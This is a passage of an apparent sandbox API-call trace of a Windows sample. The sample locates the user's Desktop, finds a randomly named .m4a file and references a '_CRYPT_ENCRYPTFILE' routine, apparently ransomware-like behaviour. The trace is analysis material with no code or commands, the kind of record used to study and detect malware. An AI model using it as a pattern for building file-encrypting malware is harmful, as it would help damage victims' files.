(Locale=0x400, dwCmpFlags=0x1, lpString1="kjGjReTolqh2VyQZXmn2.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0186.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jGjReTolqh2VyQZXmn2.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0186.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GjReTolqh2VyQZXmn2.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0186.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jReTolqh2VyQZXmn2.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0186.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ReTolqh2VyQZXmn2.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0186.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eTolqh2VyQZXmn2.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0186.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tolqh2VyQZXmn2.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0186.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="olqh2VyQZXmn2.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0186.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lqh2VyQZXmn2.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0186.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qh2VyQZXmn2.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0186.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h2VyQZXmn2.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0186.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2VyQZXmn2.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0186.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VyQZXmn2.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0186.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yQZXmn2.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0186.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QZXmn2.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0186.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZXmn2.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0186.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xmn2.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0186.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mn2.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0186.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n2.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0186.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0186.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0186.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0186.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0186.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0186.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0186.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0186.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0186.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0186.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0186.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0186.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0186.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0186.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0186.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0186.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0186.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0186.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0186.416] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0186.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0186.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0186.416] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0186.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0186.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0186.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0186.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0186.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0186.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0186.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0186.417] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0186.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0186.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0186.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0186.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0186.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0186.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0186.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0186.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0186.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0186.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0186.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0186.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0186.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0186.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0186.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0186.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0186.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0186.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0186.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0186.417] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0186.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0186.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0186.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0186.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0186.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0186.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0186.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0186.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0186.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0186.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0186.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0186.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0186.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0186.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0186.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0186.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0186.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0186.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0186.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0186.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0186.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0186.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0186.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0186.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53878 [0186.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0186.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0186.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0186.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0186.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0186.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0186.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0186.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0186.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0186.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0186.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0186.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0186.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0186.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0186.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0186.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0186.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0186.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0186.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0186.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0186.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0186.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0186.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0186.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0186.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0186.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0186.533] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0186.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0186.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0186.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0186.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0186.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0186.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0186.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0186.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0186.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0186.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0186.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0186.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0186.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0186.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0186.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0186.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0186.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0186.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0186.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0186.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0186.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0186.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0186.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0186.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0186.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0186.534] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0186.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0186.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0186.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0186.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0186.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0186.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0186.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0186.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0186.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0186.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0186.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0186.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0186.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0186.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0186.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0186.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0186.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0186.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0186.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0186.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0186.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0186.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0186.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0186.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0186.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0186.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0186.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0186.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0186.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0186.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0186.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0186.536] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0186.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0186.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0186.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0186.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0186.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0186.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0186.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0186.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0186.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0186.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0186.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0186.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0186.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0186.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0186.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0186.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0186.537] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0186.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0186.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0186.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0186.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0186.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0186.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0186.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0186.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0186.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0186.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0186.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0186.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0186.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0186.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0186.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0186.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0186.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0186.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0186.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0186.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0186.538] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/kjGjReTolqh2VyQZXmn2.m4a", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa83246c0, ftCreationTime.dwHighDateTime=0x1d5e4ad, ftLastAccessTime.dwLowDateTime=0xa46c6400, ftLastAccessTime.dwHighDateTime=0x1d5e640, ftLastWriteTime.dwLowDateTime=0xa46c6400, ftLastWriteTime.dwHighDateTime=0x1d5e640, nFileSizeHigh=0x0, nFileSizeLow=0x13925, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="kjGjReTolqh2VyQZXmn2.m4a", cAlternateFileName="KJGJRE~1.M4A")) returned 0xa87710 [0186.538] FindClose (in: hFindFile=0xa87710 | out: hFindFile=0xa87710) returned 1 [0186.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0186.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0186.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0186.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0186.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0186.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0186.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0186.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0186.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0186.539] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0186.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0186.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0186.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0186.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0186.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 